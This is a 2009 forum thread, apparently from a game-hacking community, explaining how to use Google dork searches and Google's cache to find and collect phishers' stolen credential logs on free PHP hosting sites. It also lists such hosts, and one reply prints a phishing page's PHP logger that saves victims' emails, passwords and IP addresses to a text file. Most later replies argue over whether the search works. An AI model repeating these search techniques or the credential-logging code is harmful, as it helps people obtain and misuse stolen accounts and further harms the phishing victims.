Stealing Phishers To Get Free Logs [Google Dork] menu
100% Up to 1000$
4.9/5
150% Up to 200$ & 20 Freespins
4.8/5
Up to 1 BTC
4.9/5
20% Cashback
4.8/5
Up to 5 BTC
4.8/5
100% Up to 1 BTC
4.7/5
Up to 5 BTC
4.7/5
110% Up to 1 BTC
4.6/5

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 17
  1. #1
    Nolixz's Avatar ★ Elder ★
    Reputation
    1000
    Join Date
    Oct 2006
    Posts
    1,371
    Thanks G/R
    6/17
    Trade Feedback
    16 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Stealing Phishers To Get Free Logs [Google Dork]

    Stealing Phishers To Get Free Logs [Google Dork]
    Credit goes to Hoax at evilzone.

    This is a known method (and noobish) in the hacking community. This is NOT hacking.

    Contents:

    Step 1 (Finding hosts)
    Step 2 (Getting logs)
    Step 3 (Other way to get logs)
    Step 4 Enjoy and share


    Step 1

    You need a list of hosters phishers use. Search for free hosts which allow php. In this tutorial I will be using phisherhost.com, which is used a lot by phishers.

    Step 2

    Getting logs.

    Choose a site from the list made in step one. Go to google and search for:
    Code:

    site:shisherhost.com filetype:txt

    Now the results will show .txt files on that hoster. Go throug the results and you will find phishers soon. Open them and save them. You can also add words after filetype like "logs" or "World of Warcraft". Example: "site:shisherhost.com filetype:txt logs phisher"
    Congratulations, you stole a phisher!

    Step 3

    However most of the time the hoster will have shut down the phisher. There is a nice trick for this. Just use googles cache. I love the cache <3! Then save, and you stole the phisher!



    Have Fun with this information.

    Hosts:

    000webhost.com
    ripway
    Freehostia.com
    Free Web Hosting, Create a Free Website - T35 Hosting
    Zymic.com
    Free PHP hosting, Mysql, high bandwidth, add-on domains, no banners or pop-up ads
    247hosting.org
    110mb
    OxyHost - Free Quality Web Hosting - Create your own website today
    AWARDSPACE.COM - Free Web Hosting, Domain Hosting, Professional Web Hosting, Domain registration, Affordable, Reseller Program, PHP, MySQL, Ecommerce
    0catch.com

    If you know any other hosts, tell me and i'll add to the list.

    Credit goes to Hoax at evilzone.
    Last edited by Nolixz; 08-14-2009 at 07:30 AM.


    Stealing Phishers To Get Free Logs [Google Dork]
  2. #2
    Cryde's Avatar Active Member
    Reputation
    55
    Join Date
    Jan 2009
    Posts
    298
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nice work, but we should stop bumping this method, because many script kiddies claiming to be 1337 hax0rs abuse this and steal the phisher logs of mmowned members...
    EDIT: You could add 0catch.com ..
    Last edited by Cryde; 08-14-2009 at 07:19 AM.

    PM me for Signatures!

  3. #3
    Nolixz's Avatar ★ Elder ★
    Reputation
    1000
    Join Date
    Oct 2006
    Posts
    1,371
    Thanks G/R
    6/17
    Trade Feedback
    16 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    added 0catch.com.


  4. #4
    phorentez's Avatar Contributor

    Reputation
    232
    Join Date
    May 2008
    Posts
    721
    Thanks G/R
    1/18
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I tried to search and google, and tho there is nothing coming up, i have tried seaching in 10 different ways, and nothing is pupping up. This fails!

  5. #5
    Jon Lajoie's Avatar Banned
    Reputation
    105
    Join Date
    Jul 2008
    Posts
    765
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    YOU fail phorentez...nice double post, also +2 from me, nothing I didn't know but still, helped me with something I was looking for

  6. #6
    Nolixz's Avatar ★ Elder ★
    Reputation
    1000
    Join Date
    Oct 2006
    Posts
    1,371
    Thanks G/R
    6/17
    Trade Feedback
    16 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by phorentez View Post
    This fails, it cant find any phishers.
    Are you seriously that stupid?


    DUMMY STEPS TO FREE LOGS! - EXAMPLE
    1. Go to Google.
    2. Write site:r ipway.com filetype:txt logs <- REMOVE SPACE BETWEEN R IPWAY.
    3. Click the first link which will direct you to http://h1.***********/paijo123/logg.txt.
    4. Look at code:
    $file = "logs.txt";
    $username = $_POST['email'];
    $password = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $today = date("F j, Y, g:i a");

    $handle = fopen($file, 'a');
    fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
    fwrite($handle, "\n");
    fwrite($handle, "Email: ");
    fwrite($handle, "$username");
    fwrite($handle, "\n");
    fwrite($handle, "Password: ");
    fwrite($handle, "$password");
    fwrite($handle, "\n");
    fwrite($handle, "IP Address: ");
    fwrite($handle, "$ip");
    fwrite($handle, "\n");
    fwrite($handle, "Date Submitted: ");
    fwrite($handle, "$today");
    fwrite($handle, "\n");
    fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
    fwrite($handle, "\n");
    fwrite($handle, "\n");
    fclose($handle);
    echo "";
    ?>
    5.Look for logs.txt.
    Code:
    $file = "logs.txt";
    $username = $_POST['email'];
    $password = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $today = date("F j, Y, g:i a");
    6. Replace the link. Edit it to logs.txt. You should be directed to http://h1.***********/paijo123/logs.txt.
    7. Voila.

    Idiot.
    Last edited by Nolixz; 08-14-2009 at 09:50 AM.


  7. #7
    Jon Lajoie's Avatar Banned
    Reputation
    105
    Join Date
    Jul 2008
    Posts
    765
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Nolixz View Post
    Are you seriously that stupid?


    DUMMY STEPS TO FREE LOGS! - EXAMPLE
    1. Go to Google.
    2. Write site:r ipway filetype:txt logs. <- REMOVE SPACE BETWEEN R IPWAY.
    3. Click the first link which will direct you to http://h1.***********/paijo123/logg.txt.
    4. Look at code:
    5.Look for logs.txt.
    Code:
    $file = "logs.txt";
    $username = $_POST['email'];
    $password = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $today = date("F j, Y, g:i a");
    6. Replace the link. Edit it to logs.txt. You should be directed to http://h1.***********/paijo123/logs.txt.
    7. Voila.

    Idoit.



    lol can't believe you actually went through that much trouble to explain it to him :P also, QFT and you spelled Idiot wrong haha :P

  8. #8
    Nolixz's Avatar ★ Elder ★
    Reputation
    1000
    Join Date
    Oct 2006
    Posts
    1,371
    Thanks G/R
    6/17
    Trade Feedback
    16 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ups, fail.

    Yeah, well. I'm here to share anyway

    I'm at work, typing too fast. My fingers can't really match my brain's speed


  9. #9
    Aldun's Avatar Banned
    Reputation
    616
    Join Date
    Feb 2009
    Posts
    1,365
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Don't call him an idiot, as it doesn't work at me either, however it seems to be because of some Google settings. Worked after I changed a few (Not sure now which one was the right >>)

  10. #10
    linkkid's Avatar Member
    Reputation
    15
    Join Date
    Apr 2009
    Posts
    135
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by phorentez View Post
    Yes so dont call me idiot, if its about your location in the world and google settings it cant find. Its not my problem xD
    Funny it must work because I've used this method before, so obviously it's a problem on your side. So yes, you can leave the thread now I've already reported your flaming and double posting.

  11. #11
    Elopro's Avatar Active Member
    Reputation
    19
    Join Date
    Apr 2009
    Posts
    91
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Most likely it depends on your location, I get 0 searchresults when i enter
    site:r ipway filetype:txt logs...

  12. #12
    maclone's Avatar / Authenticator enabled
    Reputation
    2420
    Join Date
    Nov 2007
    Posts
    8,726
    Thanks G/R
    0/1029
    Trade Feedback
    0 (0%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Elopro View Post
    Most likely it depends on your location, I get 0 searchresults when i enter
    site:r ipway filetype:txt logs...
    site:r ipway.com filetype:txt - duh.
    Zomfg. And no, don't ask. - Dombo did it.

  13. #13
    Nolixz's Avatar ★ Elder ★
    Reputation
    1000
    Join Date
    Oct 2006
    Posts
    1,371
    Thanks G/R
    6/17
    Trade Feedback
    16 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    2. Write site:r ipway.com filetype:txt logs <- REMOVE SPACE BETWEEN R IPWAY.
    See site:r ipway.com filetype:txt logs ?
    REMOVE the space between r and ipway.


  14. #14
    phorentez's Avatar Contributor

    Reputation
    232
    Join Date
    May 2008
    Posts
    721
    Thanks G/R
    1/18
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    omg i already did, Nolixz, whats your google settings ? if it have something to do with your location thats why half of us cant make it work -.-

  15. #15
    l1nk3's Avatar Active Member
    Reputation
    25
    Join Date
    Feb 2008
    Posts
    304
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by linkkid View Post
    Funny it must work because I've used this method before, so obviously it's a problem on your side. So yes, you can leave the thread now I've already reported your flaming and double posting.
    He never flamed kid, the worst word he's probably said in this thread was fail or idiot. I bet you don't even know what flaming is.

    Fail.

Page 1 of 2 12 LastLast

Similar Threads

  1. How to get free soulshards
    By Deathgovanz in forum World of Warcraft Exploits
    Replies: 3
    Last Post: 12-13-2006, 01:04 PM
All times are GMT -5. The time now is 10:42 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search